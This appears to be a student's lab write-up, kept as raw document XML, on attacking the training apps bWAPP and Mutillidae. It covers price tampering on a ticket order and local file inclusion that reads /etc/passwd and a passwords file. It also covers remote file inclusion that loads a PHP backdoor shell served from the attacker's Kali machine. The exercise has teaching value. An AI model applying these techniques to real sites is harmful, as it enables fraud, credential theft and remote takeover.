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F6B33" w14:textId="5079F99F" w:rsidR="005677DB" w:rsidRPr="00930874" w:rsidRDefault="00E83C15" w:rsidP="00E83C1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30874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Bwapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFBFC46" w14:textId="726A1DCD" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15" w:rsidP="00E83C1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308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5A06C50" wp14:editId="3696FAA8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>483870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="40982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131B0" w14:textId="37B6EAA2" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15" w:rsidP="00E83C1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540FE1" w14:textId="453D47CC" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15" w:rsidP="00E83C15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 xml:space="preserve"> 1 ticket = 15 EUR </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF844E2" w14:textId="1E526E83" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15" w:rsidP="00E83C15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 xml:space="preserve">We have successfully ordered 1 ticket with 15 EUR </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2485A45E" w14:textId="35FF6E09" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15" w:rsidP="00E83C1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32D187A" w14:textId="1410C58F" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15" w:rsidP="00E83C1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277AC21" w14:textId="77777777" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15" w:rsidP="00E83C1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457307" w14:textId="30AAB3AB" w:rsidR="005677DB" w:rsidRPr="00930874" w:rsidRDefault="005677DB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28B761DA" wp14:editId="6B4FC8CC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943600" cy="242252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3C15" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">now we don’t want to pay 15 EUR for 1 ticket </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68168532" w14:textId="5DB947CF" w:rsidR="005677DB" w:rsidRPr="00930874" w:rsidRDefault="005677DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601CD3A5" w14:textId="03CFC011" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="0053646D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 xml:space="preserve">we can see ticket price is </w:t>
      </w:r>
      <w:r w:rsidR="00D95ED0" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>15,</w:t>
      </w:r>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> we will alter this value </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38874B42" w14:textId="77777777" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542C609E" w14:textId="03689218" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15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019C7ACD" wp14:editId="465612CA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-38100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>468630</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="22682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A28D9" w14:textId="6FADFF8B" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01317B39" w14:textId="64D48E23" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="495DC170" w14:textId="5AADF443" w:rsidR="0053646D" w:rsidRPr="00930874" w:rsidRDefault="0053646D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 xml:space="preserve">we are booking 14 </w:t>
      </w:r>
      <w:r w:rsidR="00D95ED0" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">tickets </w:t>
      </w:r>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>and now we</w:t>
      </w:r>
      <w:r w:rsidR="00D95ED0" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> will alter</w:t>
      </w:r>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D95ED0" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ticket_price= 2</w:t>
      </w:r>
      <w:r w:rsidR="00D95ED0" w:rsidRPr="0093087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0F9ABB7" w14:textId="553D483F" w:rsidR="00D95ED0" w:rsidRPr="00930874" w:rsidRDefault="00D95ED0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B097EA4" w14:textId="2C5FA32D" w:rsidR="00D95ED0" w:rsidRPr="00930874" w:rsidRDefault="00D95ED0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>1 ticket = 2 EUR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578AE005" w14:textId="05C102E0" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589803CB" w14:textId="5AD67A55" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="711FE4D2" w14:textId="6F9A333D" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09AC9B2E" w14:textId="77777777" w:rsidR="00E83C15" w:rsidRPr="00930874" w:rsidRDefault="00E83C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541DC1DD" w14:textId="77777777" w:rsidR="00D95ED0" w:rsidRPr="00930874" w:rsidRDefault="00D95ED0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC03AE6" w14:textId="74FB6316" w:rsidR="005E41A2" w:rsidRPr="00930874" w:rsidRDefault="005677DB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33FAFFD" wp14:editId="3E2CA0C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4504055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom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ED0" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">we have successfully ordered 14 tickets in 28 EUR </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B154AAF" w14:textId="4D3F2C95" w:rsidR="00D95ED0" w:rsidRPr="00930874" w:rsidRDefault="00D95ED0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B9E41B9" w14:textId="514C17C5" w:rsidR="0064525F" w:rsidRPr="00930874" w:rsidRDefault="0064525F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F38B7EE" w14:textId="6DF51DB8" w:rsidR="0064525F" w:rsidRPr="00930874" w:rsidRDefault="0064525F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F820A36" w14:textId="6ACEA8E2" w:rsidR="0064525F" w:rsidRPr="00930874" w:rsidRDefault="0064525F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1531DC44" w14:textId="34DBE16A" w:rsidR="0064525F" w:rsidRPr="00930874" w:rsidRDefault="0064525F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726368A3" w14:textId="6AB219D7" w:rsidR="0064525F" w:rsidRPr="00930874" w:rsidRDefault="0064525F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70ECA6DC" w14:textId="41CA39C3" w:rsidR="0064525F" w:rsidRPr="00930874" w:rsidRDefault="0064525F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25274296" w14:textId="44ED9B4E" w:rsidR="009B7E35" w:rsidRPr="00930874" w:rsidRDefault="00AA0EAB" w:rsidP="00AA0EA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30874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mutillidae</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6BD32E" w14:textId="77777777" w:rsidR="00AA0EAB" w:rsidRPr="00930874" w:rsidRDefault="00AA0EAB" w:rsidP="00AA0EA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6147E9B" w14:textId="19174720" w:rsidR="00AA0EAB" w:rsidRPr="00930874" w:rsidRDefault="00930874" w:rsidP="007F07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30874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LFI:</w:t>
      </w:r>
      <w:r w:rsidR="00C826D2" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Local file Inclusion </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE8B799" w14:textId="54562A29" w:rsidR="00ED726B" w:rsidRPr="00930874" w:rsidRDefault="00ED726B" w:rsidP="007F07E5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color w:val="002636"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LFI is a web vulnerability that results from mistakes at the website or web application programmers’ end. A hacker can take advantage of this vulnerability to include malicious files which are then executed by the vulnerable website or web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250DD129" w14:textId="78168816" w:rsidR="00AA0EAB" w:rsidRPr="00930874" w:rsidRDefault="007F07E5" w:rsidP="00AA0EA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0" wp14:anchorId="7B3A1081" wp14:editId="33039C13">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>91440</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>213995</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5945505" cy="36207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EA0AE3" w14:textId="4536E07B" w:rsidR="009B7E35" w:rsidRPr="00930874" w:rsidRDefault="009B7E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0616C0CA" w14:textId="66AC0D23" w:rsidR="0064525F" w:rsidRPr="00930874" w:rsidRDefault="00AA0EAB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3C6DD8CB" wp14:editId="0E042D10">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>137160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4467225</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="22123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26B" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>robot.txt</w:t>
      </w:r>
      <w:r w:rsidR="006F2C5F" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells us which url we can access on site </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7DC3F" w14:textId="7F709A86" w:rsidR="009B7E35" w:rsidRPr="00930874" w:rsidRDefault="006F2C5F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>/mutillidae/passwords/account.txt</w:t>
      </w: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06311917" wp14:editId="49D51EF9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>38100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>445770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="42805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2F5F" w14:textId="03C1F791" w:rsidR="009B7E35" w:rsidRPr="00930874" w:rsidRDefault="006F2C5F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67E5CF68" wp14:editId="43432D46">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4822825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="2086610"/>
            <wp:effectExtent l="0" t="0" r="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74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27643899" w14:textId="31758026" w:rsidR="009B7E35" w:rsidRPr="00930874" w:rsidRDefault="009B7E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78441433" w14:textId="66C7D672" w:rsidR="009B7E35" w:rsidRPr="00930874" w:rsidRDefault="009B7E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047DEE61" w14:textId="3A772F2A" w:rsidR="00A82D82" w:rsidRPr="00930874" w:rsidRDefault="00A82D82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09593734" w14:textId="45B4DCC8" w:rsidR="006F2C5F" w:rsidRPr="00930874" w:rsidRDefault="006F2C5F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>/etc/login.defs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E12447" w14:textId="164399FD" w:rsidR="00A82D82" w:rsidRPr="00930874" w:rsidRDefault="006F2C5F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6432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="75561298" wp14:editId="6653E87F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>30480</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>123825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5935345" cy="2788920"/>
            <wp:effectExtent l="0" t="0" r="825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7C1742" w14:textId="24C4180A" w:rsidR="00A82D82" w:rsidRPr="00930874" w:rsidRDefault="00A82D82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1533A39E" w14:textId="29D642E9" w:rsidR="00A82D82" w:rsidRPr="00930874" w:rsidRDefault="006F2C5F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>/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7440225A" w14:textId="77777777" w:rsidR="006F2C5F" w:rsidRPr="00930874" w:rsidRDefault="006F2C5F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7A372C39" wp14:editId="261F758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179895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90FC9" w14:textId="7E7F572D" w:rsidR="00590FE5" w:rsidRPr="00930874" w:rsidRDefault="00590FE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76404C49" w14:textId="1BBB7EF0" w:rsidR="00590FE5" w:rsidRPr="00930874" w:rsidRDefault="00590FE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03017EC1" w14:textId="6B68631D" w:rsidR="00590FE5" w:rsidRPr="00930874" w:rsidRDefault="00590FE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4556E648" w14:textId="77777777" w:rsidR="00F405F1" w:rsidRPr="00930874" w:rsidRDefault="00F405F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F70DB0" w14:textId="529B4DC2" w:rsidR="00590FE5" w:rsidRPr="00930874" w:rsidRDefault="00590F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3087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RFI (Remote File </w:t>
      </w:r>
      <w:r w:rsidR="00F405F1" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Inclusion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66551E11" w14:textId="080F6353" w:rsidR="00F405F1" w:rsidRPr="00930874" w:rsidRDefault="00590FE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="002636"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="002636"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> Remote File Inclusion as the process of including remote files by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing the external URL to be injected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516217EE" w14:textId="2697E509" w:rsidR="00F405F1" w:rsidRPr="00930874" w:rsidRDefault="00F405F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="002636"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="002636"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.56.101 /mutillidae/index.php?page= (this is static for all page in this sever ).we have to inclusion this </w:t>
      </w:r>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002636"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>page</w:t>
      </w:r>
      <w:r w:rsidR="00007C74" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002636"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidR="00007C74" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="002636"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5EDD99" w14:textId="00052D72" w:rsidR="00590FE5" w:rsidRPr="00930874" w:rsidRDefault="00590FE5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7EB2302C" wp14:editId="7AA0435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4721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FB871" w14:textId="14CEE0B9" w:rsidR="00590FE5" w:rsidRPr="00930874" w:rsidRDefault="00007C74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>on kali machine we have some php shell script at /usr/share/webshells/php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8FDFA3" w14:textId="3F40EBDD" w:rsidR="00007C74" w:rsidRPr="00930874" w:rsidRDefault="00007C74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 xml:space="preserve">we will use simple-backdoor.php script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B2019C" w14:textId="2CFF4BE6" w:rsidR="00590FE5" w:rsidRPr="00930874" w:rsidRDefault="00007C74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7150D557" wp14:editId="590F74D2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5943600" cy="1407160"/>
            <wp:effectExtent l="0" t="0" r="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74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">we used SimpleHTTPServer to send our shell code to remote machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A622674" w14:textId="2D1048CA" w:rsidR="00F405F1" w:rsidRPr="00930874" w:rsidRDefault="00F405F1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3600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F602034" wp14:editId="60681B23">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>99060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>209550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="341820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C74" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> our kali ip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCF080C" w14:textId="00AAB2A3" w:rsidR="00590FE5" w:rsidRPr="00930874" w:rsidRDefault="00590FE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F93C659" w14:textId="1E4C77DD" w:rsidR="00007C74" w:rsidRPr="00930874" w:rsidRDefault="0093087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Inside</w:t>
      </w:r>
      <w:r w:rsidR="00007C74" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> url type location and port of php file </w:t>
      </w:r>
    </w:p>
